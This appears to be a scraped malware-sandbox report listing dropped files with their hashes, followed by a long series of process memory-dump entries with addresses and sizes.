C:\Users\Admin\AppData\Local\Temp\nbdrivesllapi.exe
MD5
e0800ff4799ab5e21f2865c40405cbd7

SHA1
b39484dc1fd72f1215ddc2af057f7fe2c556ee4b

SHA256
7255d3b3c64eaa42edbc43d7562e8a533a26d1a49efbe1b6dff87de4f6c5a73c

SHA512
6fcce955b9abcc57229625166b184d5c56eaeea70cd44600ce2af13a1bd6e7594055368e48cd6a2141558a0fa8e5e396a30bff3b0bd2d7eaddb81c96a1872a83

Download Submit
C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe
MD5
b363ee5e5ce5779f1ab7b6e96fe039ab

SHA1
5656c012b4986e5aca2ffc4aa185440fa4f63634

SHA256
70628db254882f9b532a08551993f23621aec4086568495f0d696801f75a252d

SHA512
cab1b57a825c8cf57aae22cfc99ec2329aac2518d1d71184dd6642530a8a9f8bc068b1e1c53d89fb628ff16496b1bc7db1d6b7c09a0ac0ff06fd431adb33449d

Download Submit
C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe
MD5
b363ee5e5ce5779f1ab7b6e96fe039ab

SHA1
5656c012b4986e5aca2ffc4aa185440fa4f63634

SHA256
70628db254882f9b532a08551993f23621aec4086568495f0d696801f75a252d

SHA512
cab1b57a825c8cf57aae22cfc99ec2329aac2518d1d71184dd6642530a8a9f8bc068b1e1c53d89fb628ff16496b1bc7db1d6b7c09a0ac0ff06fd431adb33449d

Download Submit
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.log
MD5
d3c963290543651656029dcf8df02d37

SHA1
4594e82b244c2ff995be8c1314b49586393fd448

SHA256
5fbfdac78c072c64a4f348ee1104a10068a1413276d4bfc31bbe866ed2b262df

SHA512
01c3db71834f3ec1ef7074777948490a060316f9d0a013cf088e9eb15b22a0a117853645cb174262a03bdb0af5310a5fe08b9344a785985313d1ffcb188dbd53

Download Submit
\ProgramData\ocIiQTVv14pHbbM\7z.dll
MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\ProgramData\ocIiQTVv14pHbbM\7z.dll
MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\ProgramData\ocIiQTVv14pHbbM\7z.dll
MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\ProgramData\ocIiQTVv14pHbbM\7z.dll
MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\ProgramData\ocIiQTVv14pHbbM\7z.dll
MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\ProgramData\ocIiQTVv14pHbbM\7z.dll
MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\ProgramData\ocIiQTVv14pHbbM\7z.dll
MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\ProgramData\ocIiQTVv14pHbbM\7z.dll
MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\ProgramData\ocIiQTVv14pHbbM\7z.dll
MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
\Users\Admin\AppData\Local\Temp\is-PJDIH.tmp\_isetup\_iscrypt.dll
MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\WSUtilities.dll
MD5
a0cefe160f504402b5148580c5b912bf

SHA1
3b6c9641a7b2edff1b60bd55b8eeb7c34eab8aee

SHA256
4333dae45b166e2ec59c49a46ff6abe3342d9191ebafda9b53803e639e33f1d1

SHA512
a9e9fff977c3e365caf0a5351b07319502a22f6ddf34267e9d77b171dbdce82d6cfb6bb49b7ba4b5c6966d97c3630ff2944a96f32c26819e43ed85b4f15f862d

Download Submit
\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP5FB5.tmp\System.Xml.dll
MD5
d0c0845b8f895f7529fbf943cb8e4957

SHA1
b9d06ebedc6f5c8e323205da9397bcf61b7bd235

SHA256
dc57cbcb532a75a7b24cc7e5dec18978aa6a42e5e49b8869fab14e0c46a02cd2

SHA512
e1c43a16b78b343ccc2546e3e9ca9349f850b0ecef7c2d8ec4f9ebbac9bcc543c8edbe5a48dc3d88833125d4f4ea36fb77d48ed34375a31874808de42d0612e5

Download Submit
\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP5FB5.tmp\System.Xml.dll
MD5
d0c0845b8f895f7529fbf943cb8e4957

SHA1
b9d06ebedc6f5c8e323205da9397bcf61b7bd235

SHA256
dc57cbcb532a75a7b24cc7e5dec18978aa6a42e5e49b8869fab14e0c46a02cd2

SHA512
e1c43a16b78b343ccc2546e3e9ca9349f850b0ecef7c2d8ec4f9ebbac9bcc543c8edbe5a48dc3d88833125d4f4ea36fb77d48ed34375a31874808de42d0612e5

Download Submit
\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP70EB.tmp\Accessibility.dll
MD5
667420b00ddf83c7e41e39f766e5d638

SHA1
5ca3927d164a48758c255cfab3b7d8fa1b0bd906

SHA256
7f0bdab7d12fcf1c1e1f9ee34d7af4593ef6e8cab2dec36dcdd34471eeaac574

SHA512
abe979f4cd74a6d4072d115301767fae13e03992ce091190bf4345a299aa87d1977e20ee96a2bb0791c2e91ed08a0d9cf575192ba9e5562db638e1d189c9b9b4

Download Submit
\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP70EB.tmp\Accessibility.dll
MD5
667420b00ddf83c7e41e39f766e5d638

SHA1
5ca3927d164a48758c255cfab3b7d8fa1b0bd906

SHA256
7f0bdab7d12fcf1c1e1f9ee34d7af4593ef6e8cab2dec36dcdd34471eeaac574

SHA512
abe979f4cd74a6d4072d115301767fae13e03992ce091190bf4345a299aa87d1977e20ee96a2bb0791c2e91ed08a0d9cf575192ba9e5562db638e1d189c9b9b4

Download Submit
memory/192-141-0x0000000000000000-mapping.dmp

Download
memory/192-165-0x0000000000000000-mapping.dmp

Download
memory/204-120-0x0000000000000000-mapping.dmp

Download
memory/416-332-0x0000000007560000-0x0000000007561000-memory.dmp

Filesize
4KB

Download
memory/496-352-0x0000000007300000-0x0000000007301000-memory.dmp

Filesize
4KB

Download
memory/512-305-0x0000000000000000-mapping.dmp

Download
memory/744-114-0x0000000000400000-0x00000000004C1000-memory.dmp

Filesize
772KB

Download
memory/856-343-0x0000000007380000-0x0000000007381000-memory.dmp

Filesize
4KB

Download
memory/856-153-0x0000000000000000-mapping.dmp

Download
memory/932-344-0x0000000000920000-0x0000000000921000-memory.dmp

Filesize
4KB

Download
memory/1004-132-0x0000000000000000-mapping.dmp

Download
memory/1004-177-0x0000000000000000-mapping.dmp

Download
memory/1008-184-0x0000000000000000-mapping.dmp

Download
memory/1008-330-0x0000000007520000-0x0000000007521000-memory.dmp

Filesize
4KB

Download
memory/1008-155-0x0000000000000000-mapping.dmp

Download
memory/1040-133-0x0000000000000000-mapping.dmp

Download
memory/1052-150-0x0000000000000000-mapping.dmp

Download
memory/1052-179-0x0000000000000000-mapping.dmp

Download
memory/1144-299-0x0000000000000000-mapping.dmp

Download
memory/1172-320-0x0000000006F60000-0x0000000006F61000-memory.dmp

Filesize
4KB

Download
memory/1236-156-0x0000000000000000-mapping.dmp

Download
memory/1272-349-0x0000000007630000-0x0000000007631000-memory.dmp

Filesize
4KB

Download
memory/1272-338-0x0000000007430000-0x0000000007431000-memory.dmp

Filesize
4KB

Download
memory/1296-333-0x0000000006F30000-0x0000000006F31000-memory.dmp

Filesize
4KB

Download
memory/1328-360-0x0000000006AF0000-0x0000000006AF1000-memory.dmp

Filesize
4KB

Download
memory/1452-124-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/1452-122-0x0000000000000000-mapping.dmp

Download
memory/1500-336-0x00000000073D0000-0x00000000073D1000-memory.dmp

Filesize
4KB

Download
memory/1520-152-0x0000000000000000-mapping.dmp

Download
memory/1552-134-0x0000000000000000-mapping.dmp

Download
memory/1552-335-0x00000000070A0000-0x00000000070A1000-memory.dmp

Filesize
4KB

Download
memory/1552-329-0x00000000052F0000-0x00000000052F1000-memory.dmp

Filesize
4KB

Download
memory/1704-147-0x0000000000000000-mapping.dmp

Download
memory/1776-119-0x00000000006D0000-0x00000000006D1000-memory.dmp

Filesize
4KB

Download
memory/1776-116-0x0000000000000000-mapping.dmp

Download
memory/1780-185-0x00000000074D0000-0x00000000074D1000-memory.dmp

Filesize
4KB

Download
memory/1780-239-0x0000000008BF0000-0x0000000008C23000-memory.dmp

Filesize
204KB

Download
memory/1780-173-0x0000000006C60000-0x0000000006C61000-memory.dmp

Filesize
4KB

Download
memory/1780-176-0x0000000007530000-0x0000000007531000-memory.dmp

Filesize
4KB

Download
memory/1780-166-0x0000000000000000-mapping.dmp

Download
memory/1780-169-0x0000000001010000-0x0000000001011000-memory.dmp

Filesize
4KB

Download
memory/1780-170-0x0000000006D30000-0x0000000006D31000-memory.dmp

Filesize
4KB

Download
memory/1780-171-0x0000000006B80000-0x0000000006B81000-memory.dmp

Filesize
4KB

Download
memory/1780-187-0x0000000007CF0000-0x0000000007CF1000-memory.dmp

Filesize
4KB

Download
memory/1780-142-0x0000000000000000-mapping.dmp

Download
memory/1780-183-0x00000000010E2000-0x00000000010E3000-memory.dmp

Filesize
4KB

Download
memory/1780-342-0x00000000076E0000-0x00000000076E1000-memory.dmp

Filesize
4KB

Download
memory/1780-182-0x00000000010E0000-0x00000000010E1000-memory.dmp

Filesize
4KB

Download
memory/1780-195-0x0000000007C10000-0x0000000007C11000-memory.dmp

Filesize
4KB

Download
memory/1780-246-0x0000000008BD0000-0x0000000008BD1000-memory.dmp

Filesize
4KB

Download
memory/1780-251-0x0000000008D20000-0x0000000008D21000-memory.dmp

Filesize
4KB

Download
memory/1780-252-0x0000000008F40000-0x0000000008F41000-memory.dmp

Filesize
4KB

Download
memory/1780-279-0x000000007F210000-0x000000007F211000-memory.dmp

Filesize
4KB

Download
memory/1780-280-0x00000000010E3000-0x00000000010E4000-memory.dmp

Filesize
4KB

Download
memory/1780-172-0x0000000007360000-0x0000000007361000-memory.dmp

Filesize
4KB

Download
memory/1784-135-0x0000000000000000-mapping.dmp

Download
memory/1816-194-0x0000000000000000-mapping.dmp

Download
memory/1828-357-0x0000000007910000-0x0000000007911000-memory.dmp

Filesize
4KB

Download
memory/1908-131-0x00000000007A0000-0x00000000007A1000-memory.dmp

Filesize
4KB

Download
memory/1908-128-0x0000000000000000-mapping.dmp

Download
memory/1956-290-0x0000000000000000-mapping.dmp

Download
memory/2032-163-0x0000000000000000-mapping.dmp

Download
memory/2032-139-0x0000000000000000-mapping.dmp

Download
memory/2080-350-0x0000000140000000-0x000000014038E000-memory.dmp

Filesize
3.6MB

Download
memory/2084-181-0x0000000000000000-mapping.dmp

Download
memory/2196-348-0x0000000005500000-0x0000000005501000-memory.dmp

Filesize
4KB

Download
memory/2196-159-0x0000000000000000-mapping.dmp

Download
memory/2216-143-0x0000000000000000-mapping.dmp

Download
memory/2216-302-0x0000000000000000-mapping.dmp

Download
memory/2216-307-0x000000001C830000-0x000000001C832000-memory.dmp

Filesize
8KB

Download
memory/2220-297-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

Filesize
4KB

Download
memory/2220-160-0x0000000000000000-mapping.dmp

Download
memory/2220-298-0x0000000005380000-0x0000000005986000-memory.dmp

Filesize
6.0MB

Download
memory/2220-295-0x0000000000416256-mapping.dmp

Download
memory/2220-296-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/2232-306-0x0000000000000000-mapping.dmp

Download
memory/2256-308-0x0000000000000000-mapping.dmp

Download
memory/2256-317-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/2296-157-0x0000000000000000-mapping.dmp

Download
memory/2316-154-0x0000000000000000-mapping.dmp

Download
memory/2316-361-0x0000000006F10000-0x0000000006F11000-memory.dmp

Filesize
4KB

Download
memory/2512-334-0x00000000076C0000-0x00000000076C1000-memory.dmp

Filesize
4KB

Download
memory/2512-203-0x0000000000000000-mapping.dmp

Download
memory/2564-199-0x0000000000000000-mapping.dmp

Download
memory/2600-137-0x0000000000000000-mapping.dmp

Download
memory/2600-161-0x0000000000000000-mapping.dmp

Download
memory/2700-347-0x0000000007080000-0x0000000007081000-memory.dmp

Filesize
4KB

Download
memory/2720-321-0x0000000007920000-0x0000000007921000-memory.dmp

Filesize
4KB

Download
memory/2744-145-0x0000000000000000-mapping.dmp

Download
memory/3112-355-0x0000000006A30000-0x0000000006A31000-memory.dmp

Filesize
4KB

Download
memory/3348-345-0x0000000006C90000-0x0000000006C91000-memory.dmp

Filesize
4KB

Download
memory/3476-339-0x0000000006BE0000-0x0000000006BE1000-memory.dmp

Filesize
4KB

Download
memory/3488-354-0x00000000072E0000-0x00000000072E1000-memory.dmp

Filesize
4KB

Download
memory/3608-149-0x0000000000000000-mapping.dmp

Download
memory/3620-358-0x0000000007880000-0x0000000007881000-memory.dmp

Filesize
4KB

Download
memory/3636-356-0x0000000006BD0000-0x0000000006BD1000-memory.dmp

Filesize
4KB

Download
memory/3656-340-0x00000000074E0000-0x00000000074E1000-memory.dmp

Filesize
4KB

Download
memory/3660-331-0x000000001C6D0000-0x000000001C6D2000-memory.dmp

Filesize
8KB

Download
memory/3664-127-0x0000000000000000-mapping.dmp

Download
memory/3672-287-0x0000000004E23000-0x0000000004E24000-memory.dmp

Filesize
4KB

Download
memory/3672-215-0x0000000000000000-mapping.dmp

Download
memory/3672-281-0x0000000000000000-mapping.dmp

Download
memory/3672-284-0x0000000004E20000-0x0000000004E21000-memory.dmp

Filesize
4KB

Download
memory/3672-285-0x0000000004E22000-0x0000000004E23000-memory.dmp

Filesize
4KB

Download
memory/3672-286-0x000000007F0B0000-0x000000007F0B1000-memory.dmp

Filesize
4KB

Download
memory/3688-148-0x0000000000000000-mapping.dmp

Download
memory/3708-351-0x0000000007960000-0x0000000007961000-memory.dmp

Filesize
4KB

Download
memory/3708-337-0x0000000007AF0000-0x0000000007AF1000-memory.dmp

Filesize
4KB

Download
memory/3724-311-0x0000000000000000-mapping.dmp

Download
memory/3724-318-0x0000000002140000-0x0000000002141000-memory.dmp

Filesize
4KB

Download
memory/3756-162-0x0000000000000000-mapping.dmp

Download
memory/3756-138-0x0000000000000000-mapping.dmp

Download
memory/3760-146-0x0000000000000000-mapping.dmp

Download
memory/3772-359-0x0000000007A40000-0x0000000007A41000-memory.dmp

Filesize
4KB

Download
memory/3776-341-0x0000000005480000-0x0000000005481000-memory.dmp

Filesize
4KB

Download
memory/3780-190-0x0000000000000000-mapping.dmp

Download
memory/3784-136-0x0000000000000000-mapping.dmp

Download
memory/3808-228-0x00000000007A1000-0x000000000089D000-memory.dmp

Filesize
1008KB

Download
memory/3808-288-0x0000000000BB0000-0x0000000000BB7000-memory.dmp

Filesize
28KB

Download
memory/3808-225-0x0000000000000000-mapping.dmp

Download
memory/3808-227-0x00000000007A0000-0x00000000008F3000-memory.dmp

Filesize
1.3MB

Download
memory/3808-233-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

Filesize
4KB

Download
memory/3880-158-0x0000000000000000-mapping.dmp

Download
memory/3892-207-0x0000000000000000-mapping.dmp

Download
memory/3892-140-0x0000000000000000-mapping.dmp

Download
memory/3892-164-0x0000000000000000-mapping.dmp

Download
memory/3896-211-0x0000000000000000-mapping.dmp

Download
memory/3896-144-0x0000000000000000-mapping.dmp

Download
memory/3924-175-0x0000000000000000-mapping.dmp

Download
memory/4040-151-0x0000000000000000-mapping.dmp

Download
memory/4040-219-0x0000000000000000-mapping.dmp

Download
memory/4052-353-0x0000000007510000-0x0000000007511000-memory.dmp

Filesize
4KB

Download
memory/4092-346-0x0000000004C40000-0x0000000004C41000-memory.dmp

Filesize
4KB

Download
memory/4092-313-0x0000000000000000-mapping.dmp

Download
memory/4092-319-0x0000000000B70000-0x0000000000B72000-memory.dmp

Filesize
8KB

Download